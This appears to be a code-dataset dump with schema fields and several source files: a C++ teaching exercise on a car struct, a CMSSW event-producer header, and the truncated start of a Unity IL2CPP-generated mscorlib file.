blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
264
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
85
license_type
stringclasses
2 values
repo_name
stringlengths
5
140
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
905 values
visit_date
timestamp[us]date
2015-08-09 11:21:18
2023-09-06 10:45:07
revision_date
timestamp[us]date
1997-09-14 05:04:47
2023-09-17 19:19:19
committer_date
timestamp[us]date
1997-09-14 05:04:47
2023-09-06 06:22:19
github_id
int64
3.89k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-07 00:51:45
2023-09-14 21:58:39
gha_created_at
timestamp[us]date
2008-03-27 23:40:48
2023-08-21 23:17:38
gha_language
stringclasses
141 values
src_encoding
stringclasses
34 values
language
stringclasses
1 value
is_vendor
bool
1 class
is_generated
bool
2 classes
length_bytes
int64
3
10.4M
extension
stringclasses
115 values
content
stringlengths
3
10.4M
authors
sequencelengths
1
1
author_id
stringlengths
0
158
f73a9c1981f31104bdbb761c33ae947ec9dcb9fd
7888f2f75d277c64bfc71009ec0eb32bc45a1681
/Arquivos_Curso_CPP/aula34.cpp
b5434b56f2a958f452f694040dbaf519653c2a39
[ "MIT" ]
permissive
maledicente/cursos
bba06a0d09037fd8cae69927c996805d513ddb25
00ace48da7e48b04485e4ca97b3ca9ba5f33a283
refs/heads/master
2023-08-12T03:01:02.799974
2021-10-11T14:29:35
2021-10-11T14:29:35
273,795,405
1
0
null
null
null
null
UTF-8
C++
false
false
949
cpp
#include <iostream> using namespace std; struct Carro{ string nome; string cor; int pot; int velMax; int vel; void insere(string stnome, string stcor, int stpot, int stvelmax){ nome=stnome; cor=stcor; pot=stpot; velMax=stvelmax; vel=0; } void mostra(){ cout << "\nNome.............: " << nome << "\n"; cout << "Cor..............: " << cor << "\n"; cout << "Potencia.........: " << pot << "\n"; cout << "Velocidade atual.: " << vel << "\n"; cout << "Velocidade Maxima: " << velMax << "\n\n"; } void mudaVel(int mv){ vel=mv; if(vel > velMax){ vel=velMax; } if(vel < 0){ vel=0; } } }; int main() { Carro car1,car2,car3,car4; car1.insere("Tornado","Vermelho",450,350); car1.mostra(); car1.mudaVel(400); car1.mostra(); return 0; }
6e4ba65affc70d8635446b819f40e8205443a283
6bb68e521186ea10be2e768a127e19e7907b16ad
/interface/EventProducer.h
af3aabb4d53c3731f61cca819384c4903daf2a7b
[]
no_license
mdelcourt/Framework
f0fafcd7f85c30b6e847ee2809a1ed706f7e550c
662d269a889516ea453a777f8571755f187d097c
refs/heads/CMSSW_7_4_12p
2021-01-22T15:11:28.546152
2015-10-18T11:25:57
2015-10-18T11:25:57
45,177,444
0
0
null
2015-10-29T10:54:09
2015-10-29T10:54:08
null
UTF-8
C++
false
false
2,558
h
#ifndef EVENT_PRODUCER #define EVENT_PRODUCER #include <cp3_llbb/Framework/interface/Producer.h> #include <SimDataFormats/GeneratorProducts/interface/GenEventInfoProduct.h> #include <SimDataFormats/GeneratorProducts/interface/LHEEventProduct.h> #include <SimDataFormats/PileupSummaryInfo/interface/PileupSummaryInfo.h> class EventProducer: public Framework::Producer { public: EventProducer(const std::string& name, const ROOT::TreeGroup& tree, const edm::ParameterSet& config): Producer(name, tree, config) { } virtual ~EventProducer() {} virtual void doConsumes(const edm::ParameterSet& config, edm::ConsumesCollector&& collector) override { m_rho_token = collector.consumes<double>(config.getUntrackedParameter<edm::InputTag>("rho", edm::InputTag("fixedGridRhoFastjetAll"))); m_pu_info_token = collector.consumes<std::vector<PileupSummaryInfo>>(config.getUntrackedParameter<edm::InputTag>("pu_summary", edm::InputTag("addPileupInfo"))); m_gen_info_token = collector.consumes<GenEventInfoProduct>(config.getUntrackedParameter<edm::InputTag>("gen_info", edm::InputTag("generator"))); m_lhe_info_token = collector.consumes<LHEEventProduct>(config.getUntrackedParameter<edm::InputTag>("lhe_info", edm::InputTag("externalLHEProducer"))); } virtual void produce(edm::Event& event, const edm::EventSetup& eventSetup) override; virtual void endJob(MetadataManager&) override; private: // Tokens edm::EDGetTokenT<double> m_rho_token; edm::EDGetTokenT<std::vector<PileupSummaryInfo>> m_pu_info_token; edm::EDGetTokenT<GenEventInfoProduct> m_gen_info_token; edm::EDGetTokenT<LHEEventProduct> m_lhe_info_token; float m_event_weight_sum = 0; public: // Tree members BRANCH(run, ULong64_t); BRANCH(lumi, ULong64_t); BRANCH(event, ULong64_t); BRANCH(rho, float); BRANCH(npu, int); BRANCH(true_interactions, float); BRANCH(pt_hat, float); BRANCH(weight, float); BRANCH(alpha_QCD, float); BRANCH(alpha_QED, float); BRANCH(q_scale, float); BRANCH(pdf_id, std::pair<int, int>); BRANCH(pdf_x, std::pair<float, float>); BRANCH(n_ME_partons, int); BRANCH(n_ME_partons_filtered, int); BRANCH(lhe_originalXWGTUP, float); BRANCH(lhe_SCALUP, float); BRANCH(lhe_weights, std::vector<std::pair<std::string, float>>); }; #endif
c9edcaad39d41766c49e10b91733bac672468069
68d4acf7f13c9f998e61ad9fc1ab094c30750178
/Temp/StagingArea/Data/il2cppOutput/Bulk_mscorlib_3.cpp
c76cf1b5705dd01dec30b4afbbc545d1e9121ff3
[]
no_license
prateek2211/RopeCutter
60cfff1b8e321f53dcba5b09114f57a1c1b2d118
aa0dc3a7c6c5587209cd873045c9ed2c20adbcce
refs/heads/master
2020-05-05T09:52:14.596963
2019-04-07T11:33:20
2019-04-07T11:33:20
179,920,829
1
0
null
null
null
null
UTF-8
C++
false
false
2,052,282
cpp
#include "il2cpp-config.h" #ifndef _MSC_VER # include <alloca.h> #else # include <malloc.h> #endif #include <cstring> #include <string.h> #include <stdio.h> #include <cmath> #include <limits> #include <assert.h> #include <stdint.h> #include "il2cpp-class-internals.h" #include "codegen/il2cpp-codegen.h" #include "il2cpp-object-internals.h" template <typename T1> struct VirtActionInvoker1 { typedef void (*Action)(void*, T1, const RuntimeMethod*); static inline void Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); ((Action)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename R> struct VirtFuncInvoker0 { typedef R (*Func)(void*, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeObject* obj) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); return ((Func)invokeData.methodPtr)(obj, invokeData.method); } }; struct VirtActionInvoker0 { typedef void (*Action)(void*, const RuntimeMethod*); static inline void Invoke (Il2CppMethodSlot slot, RuntimeObject* obj) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); ((Action)invokeData.methodPtr)(obj, invokeData.method); } }; template <typename R, typename T1> struct VirtFuncInvoker1 { typedef R (*Func)(void*, T1, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); return ((Func)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1, typename T2> struct VirtActionInvoker2 { typedef void (*Action)(void*, T1, T2, const RuntimeMethod*); static inline void Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1, T2 p2) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); ((Action)invokeData.methodPtr)(obj, p1, p2, invokeData.method); } }; template <typename R, typename T1, typename T2, typename T3> struct VirtFuncInvoker3 { typedef R (*Func)(void*, T1, T2, T3, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1, T2 p2, T3 p3) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); return ((Func)invokeData.methodPtr)(obj, p1, p2, p3, invokeData.method); } }; template <typename R, typename T1, typename T2, typename T3, typename T4, typename T5, typename T6, typename T7> struct VirtFuncInvoker7 { typedef R (*Func)(void*, T1, T2, T3, T4, T5, T6, T7, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1, T2 p2, T3 p3, T4 p4, T5 p5, T6 p6, T7 p7) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); return ((Func)invokeData.methodPtr)(obj, p1, p2, p3, p4, p5, p6, p7, invokeData.method); } }; template <typename R, typename T1, typename T2, typename T3, typename T4> struct VirtFuncInvoker4 { typedef R (*Func)(void*, T1, T2, T3, T4, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1, T2 p2, T3 p3, T4 p4) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); return ((Func)invokeData.methodPtr)(obj, p1, p2, p3, p4, invokeData.method); } }; template <typename R, typename T1, typename T2, typename T3, typename T4, typename T5, typename T6, typename T7, typename T8, typename T9> struct VirtFuncInvoker9 { typedef R (*Func)(void*, T1, T2, T3, T4, T5, T6, T7, T8, T9, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeObject* obj, T1 p1, T2 p2, T3 p3, T4 p4, T5 p5, T6 p6, T7 p7, T8 p8, T9 p9) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_virtual_invoke_data(slot, obj); return ((Func)invokeData.methodPtr)(obj, p1, p2, p3, p4, p5, p6, p7, p8, p9, invokeData.method); } }; struct GenericVirtActionInvoker0 { typedef void (*Action)(void*, const RuntimeMethod*); static inline void Invoke (const RuntimeMethod* method, RuntimeObject* obj) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_virtual_invoke_data(method, obj, &invokeData); ((Action)invokeData.methodPtr)(obj, invokeData.method); } }; template <typename R, typename T1> struct GenericVirtFuncInvoker1 { typedef R (*Func)(void*, T1, const RuntimeMethod*); static inline R Invoke (const RuntimeMethod* method, RuntimeObject* obj, T1 p1) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_virtual_invoke_data(method, obj, &invokeData); return ((Func)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1> struct GenericVirtActionInvoker1 { typedef void (*Action)(void*, T1, const RuntimeMethod*); static inline void Invoke (const RuntimeMethod* method, RuntimeObject* obj, T1 p1) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_virtual_invoke_data(method, obj, &invokeData); ((Action)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1, typename T2> struct GenericVirtActionInvoker2 { typedef void (*Action)(void*, T1, T2, const RuntimeMethod*); static inline void Invoke (const RuntimeMethod* method, RuntimeObject* obj, T1 p1, T2 p2) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_virtual_invoke_data(method, obj, &invokeData); ((Action)invokeData.methodPtr)(obj, p1, p2, invokeData.method); } }; struct InterfaceActionInvoker0 { typedef void (*Action)(void*, const RuntimeMethod*); static inline void Invoke (Il2CppMethodSlot slot, RuntimeClass* declaringInterface, RuntimeObject* obj) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_interface_invoke_data(slot, obj, declaringInterface); ((Action)invokeData.methodPtr)(obj, invokeData.method); } }; template <typename R, typename T1> struct InterfaceFuncInvoker1 { typedef R (*Func)(void*, T1, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeClass* declaringInterface, RuntimeObject* obj, T1 p1) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_interface_invoke_data(slot, obj, declaringInterface); return ((Func)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1> struct InterfaceActionInvoker1 { typedef void (*Action)(void*, T1, const RuntimeMethod*); static inline void Invoke (Il2CppMethodSlot slot, RuntimeClass* declaringInterface, RuntimeObject* obj, T1 p1) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_interface_invoke_data(slot, obj, declaringInterface); ((Action)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1, typename T2> struct InterfaceActionInvoker2 { typedef void (*Action)(void*, T1, T2, const RuntimeMethod*); static inline void Invoke (Il2CppMethodSlot slot, RuntimeClass* declaringInterface, RuntimeObject* obj, T1 p1, T2 p2) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_interface_invoke_data(slot, obj, declaringInterface); ((Action)invokeData.methodPtr)(obj, p1, p2, invokeData.method); } }; template <typename R> struct InterfaceFuncInvoker0 { typedef R (*Func)(void*, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeClass* declaringInterface, RuntimeObject* obj) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_interface_invoke_data(slot, obj, declaringInterface); return ((Func)invokeData.methodPtr)(obj, invokeData.method); } }; template <typename R, typename T1, typename T2> struct InterfaceFuncInvoker2 { typedef R (*Func)(void*, T1, T2, const RuntimeMethod*); static inline R Invoke (Il2CppMethodSlot slot, RuntimeClass* declaringInterface, RuntimeObject* obj, T1 p1, T2 p2) { const VirtualInvokeData& invokeData = il2cpp_codegen_get_interface_invoke_data(slot, obj, declaringInterface); return ((Func)invokeData.methodPtr)(obj, p1, p2, invokeData.method); } }; struct GenericInterfaceActionInvoker0 { typedef void (*Action)(void*, const RuntimeMethod*); static inline void Invoke (const RuntimeMethod* method, RuntimeObject* obj) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_interface_invoke_data(method, obj, &invokeData); ((Action)invokeData.methodPtr)(obj, invokeData.method); } }; template <typename R, typename T1> struct GenericInterfaceFuncInvoker1 { typedef R (*Func)(void*, T1, const RuntimeMethod*); static inline R Invoke (const RuntimeMethod* method, RuntimeObject* obj, T1 p1) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_interface_invoke_data(method, obj, &invokeData); return ((Func)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1> struct GenericInterfaceActionInvoker1 { typedef void (*Action)(void*, T1, const RuntimeMethod*); static inline void Invoke (const RuntimeMethod* method, RuntimeObject* obj, T1 p1) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_interface_invoke_data(method, obj, &invokeData); ((Action)invokeData.methodPtr)(obj, p1, invokeData.method); } }; template <typename T1, typename T2> struct GenericInterfaceActionInvoker2 { typedef void (*Action)(void*, T1, T2, const RuntimeMethod*); static inline void Invoke (const RuntimeMethod* method, RuntimeObject* obj, T1 p1, T2 p2) { VirtualInvokeData invokeData; il2cpp_codegen_get_generic_interface_invoke_data(method, obj, &invokeData); ((Action)invokeData.methodPtr)(obj, p1, p2, invokeData.method); } }; // Microsoft.Win32.RegistryKey struct RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574; // Microsoft.Win32.SafeHandles.SafeFileHandle struct SafeFileHandle_tE1B31BE63CD11BBF2B9B6A205A72735F32EB1BCB; // Mono.Globalization.Unicode.SimpleCollator struct SimpleCollator_tC3A1720B7D3D850D5C23BE8E366D821EBA923D89; // System.Action`1<System.Object> struct Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0; // System.ArgumentException struct ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1; // System.ArgumentNullException struct ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD; // System.ArgumentOutOfRangeException struct ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA; // System.AsyncCallback struct AsyncCallback_t3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4; // System.Attribute struct Attribute_tF048C13FB3C8CFCC53F82290E4A3F621089F9A74; // System.Boolean[] struct BooleanU5BU5D_t192C7579715690E25BD5EFED47F3E0FC9DCB2040; // System.ByteMatcher struct ByteMatcher_tB199BDD35E2575B84D9FDED34954705653D241DC; // System.Byte[] struct ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821; // System.Char[] struct CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2; // System.Collections.Generic.Dictionary`2<System.Int32,System.Globalization.CultureInfo> struct Dictionary_2_tC88A56872F7C79DBB9582D4F3FC22ED5D8E0B98B; // System.Collections.Generic.Dictionary`2<System.String,Mono.Globalization.Unicode.SimpleCollator> struct Dictionary_2_t61B96E9258C1E296057BCD8C4D2015846D2BB8F3; // System.Collections.Generic.Dictionary`2<System.String,System.Globalization.CultureInfo> struct Dictionary_2_tBA5388DBB42BF620266F9A48E8B859BBBB224E25; // System.Collections.Generic.Dictionary`2<System.String,System.Int32> struct Dictionary_2_tD6E204872BA9FD506A0287EF68E285BEB9EC0DFB; // System.Collections.Generic.List`1<System.Collections.Generic.KeyValuePair`2<System.DateTime,System.TimeType>> struct List_1_tD2FC74CFEE011F74F31183756A690154468817E9; // System.Collections.Hashtable struct Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9; // System.Collections.IComparer struct IComparer_t6A5E1BC727C7FF28888E407A797CE1ED92DA8E95; // System.Collections.IDictionary struct IDictionary_t1BD5C1546718A374EA8122FBD6C6EE45331E8CE7; // System.Collections.IEnumerator struct IEnumerator_t8789118187258CC88B77AFAC6315B5AF87D3E18A; // System.Collections.ObjectModel.ReadOnlyCollection`1<System.TimeZoneInfo> struct ReadOnlyCollection_1_tD63B9891087CF571DD4322388BDDBAEEB7606FE0; // System.Collections.SortedList struct SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E; // System.Collections.SortedList/SortedListEnumerator struct SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E; // System.Collections.Stack struct Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643; // System.Collections.Stack/StackEnumerator struct StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA; // System.Console/InternalCancelHandler struct InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A; // System.Console/WindowsConsole/WindowsCancelHandler struct WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51; // System.ConsoleCancelEventArgs struct ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760; // System.ConsoleCancelEventHandler struct ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4; // System.ContextBoundObject struct ContextBoundObject_tB24722752964E8FCEB9E1E4F6707FA88DFA0DFF0; // System.ContextStaticAttribute struct ContextStaticAttribute_tDE78CF42C2CA6949E7E99D3E63D35003A0660AA6; // System.CultureAwareComparer struct CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058; // System.CurrentSystemTimeZone struct CurrentSystemTimeZone_t7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171; // System.DBNull struct DBNull_t7400E04939C2C29699B389B106997892BF53A8E5; // System.DateTimeParse/DS[] struct DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E; // System.DateTimeParse/DS[][] struct DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1; // System.DateTimeParse/MatchNumberDelegate struct MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D; // System.Delegate struct Delegate_t; // System.DelegateData struct DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE; // System.Delegate[] struct DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86; // System.Diagnostics.StackTrace[] struct StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196; // System.EventArgs struct EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E; // System.Exception struct Exception_t; // System.FormatException struct FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC; // System.Func`2<System.Object,System.Int32> struct Func_2_t8B2DA3FB30280CE3D92F50E9CCAACEE4828789A6; // System.Func`2<System.Object,System.String> struct Func_2_t44B347E67E515867D995E8BD5EFD67FA88CE53CF; // System.Globalization.Calendar struct Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5; // System.Globalization.CodePageDataItem struct CodePageDataItem_t6E34BEE9CCCBB35C88D714664633AF6E5F5671FB; // System.Globalization.CompareInfo struct CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1; // System.Globalization.CultureData struct CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD; // System.Globalization.CultureInfo struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F; // System.Globalization.DateTimeFormatInfo struct DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F; // System.Globalization.NumberFormatInfo struct NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8; // System.Globalization.SortVersion struct SortVersion_tE7080CE09A0B8CE226F8046C0D1374DD0A0CAE71; // System.Globalization.TextInfo struct TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8; // System.Globalization.TokenHashValue[] struct TokenHashValueU5BU5D_t5C8B41D89122FC1D3ED53C946C2656DA03CE899A; // System.IAsyncResult struct IAsyncResult_t8E194308510B375B42432981AE5E7488C458D598; // System.IConsoleDriver struct IConsoleDriver_t484163236D7810E338FC3D246EDF2DCAC42C0E37; // System.IConvertible struct IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380; // System.IFormatProvider struct IFormatProvider_t4247E13AE2D97A079B88D594B7ABABF313259901; // System.IO.CStreamReader struct CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D; // System.IO.CStreamWriter struct CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450; // System.IO.FileStream struct FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418; // System.IO.Stream struct Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7; // System.IO.Stream/ReadWriteTask struct ReadWriteTask_tFA17EEE8BC5C4C83EAEFCC3662A30DE351ABAA80; // System.IO.StreamReader struct StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E; // System.IO.TextReader struct TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A; // System.IO.TextWriter struct TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0; // System.IO.UnexceptionalStreamReader struct UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA; // System.IO.UnexceptionalStreamWriter struct UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB; // System.Int32 struct Int32_t585191389E07734F19F3156FF88FB3EF4800D102; // System.Int32[] struct Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83; // System.Int64[] struct Int64U5BU5D_tE04A3DEF6AF1C852A43B98A24EFB715806B37F5F; // System.IntPtr[] struct IntPtrU5BU5D_t4DC01DCB9A6DF6C9792A6513595D7A11E637DCDD; // System.InvalidCastException struct InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA; // System.InvalidOperationException struct InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1; // System.MarshalByRefObject struct MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF; // System.MonoTypeInfo struct MonoTypeInfo_t9A65BA5324D14FDFEB7644EEE6E1BDF74B8A393D; // System.NotSupportedException struct NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010; // System.NullConsoleDriver struct NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D; // System.Object[] struct ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A; // System.OutOfMemoryException struct OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7; // System.OverflowException struct OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D; // System.Reflection.Assembly/ResolveEventHolder struct ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E; // System.Reflection.Binder struct Binder_t4D5CB06963501D32847C057B57157D6DC49CA759; // System.Reflection.MemberFilter struct MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381; // System.Reflection.MethodInfo struct MethodInfo_t; // System.Reflection.RuntimeAssembly struct RuntimeAssembly_t5EE9CD749D82345AE5635B9665665C31A3308EB1; // System.Reflection.RuntimeConstructorInfo struct RuntimeConstructorInfo_tF21A59967629968D0BE5D0DAF677662824E9629D; // System.Runtime.Serialization.IFormatterConverter struct IFormatterConverter_tC3280D64D358F47EA4DAF1A65609BA0FC081888A; // System.Runtime.Serialization.SafeSerializationManager struct SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770; // System.Runtime.Serialization.SerializationException struct SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210; // System.Runtime.Serialization.SerializationInfo struct SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26; // System.Runtime.Serialization.SerializationInfoEnumerator struct SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5; // System.RuntimeType struct RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F; // System.RuntimeType[] struct RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE; // System.String struct String_t; // System.StringComparer struct StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE; // System.String[] struct StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E; // System.TermInfoDriver struct TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653; // System.TermInfoReader struct TermInfoReader_tCAABF3484E6F0AA298F809766C52CA9DC4E6C55C; // System.Text.Decoder struct Decoder_tEEF45EB6F965222036C49E8EC6BA8A0692AA1F26; // System.Text.DecoderFallback struct DecoderFallback_t128445EB7676870485230893338EF044F6B72F60; // System.Text.Encoder struct Encoder_t29B2697B0B775EABC52EBFB914F327BE9B1A3464; // System.Text.EncoderFallback struct EncoderFallback_tDE342346D01608628F1BCEBB652D31009852CF63; // System.Text.Encoding struct Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4; // System.Text.StringBuilder struct StringBuilder_t; // System.Threading.SemaphoreSlim struct SemaphoreSlim_t2E2888D1C0C8FAB80823C76F1602E4434B8FA048; // System.Threading.Tasks.Task struct Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2; // System.TimeZone struct TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454; // System.TimeZoneInfo struct TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777; // System.TimeZoneInfo/AdjustmentRule[] struct AdjustmentRuleU5BU5D_t1106C3E56412DC2C8D9B745150D35E342A85D8AD; // System.Type struct Type_t; // System.Type[] struct TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F; // System.UInt32[] struct UInt32U5BU5D_t9AA834AF2940E75BBF8E3F08FF0D20D266DB71CB; // System.Void struct Void_t22962CB4C05B1D89B55A6E1139F0E87A90987017; // System.WindowsConsoleDriver struct WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42; extern RuntimeClass* ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var; extern RuntimeClass* ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var; extern RuntimeClass* ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var; extern RuntimeClass* Boolean_tB53F6830F670160873277339AA58F15CAED4399C_il2cpp_TypeInfo_var; extern RuntimeClass* ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821_il2cpp_TypeInfo_var; extern RuntimeClass* Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07_il2cpp_TypeInfo_var; extern RuntimeClass* CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D_il2cpp_TypeInfo_var; extern RuntimeClass* CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450_il2cpp_TypeInfo_var; extern RuntimeClass* CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2_il2cpp_TypeInfo_var; extern RuntimeClass* Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var; extern RuntimeClass* ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760_il2cpp_TypeInfo_var; extern RuntimeClass* ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4_il2cpp_TypeInfo_var; extern RuntimeClass* ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var; extern RuntimeClass* ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_il2cpp_TypeInfo_var; extern RuntimeClass* Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var; extern RuntimeClass* Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var; extern RuntimeClass* CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058_il2cpp_TypeInfo_var; extern RuntimeClass* CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var; extern RuntimeClass* DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_il2cpp_TypeInfo_var; extern RuntimeClass* DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1_il2cpp_TypeInfo_var; extern RuntimeClass* DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var; extern RuntimeClass* 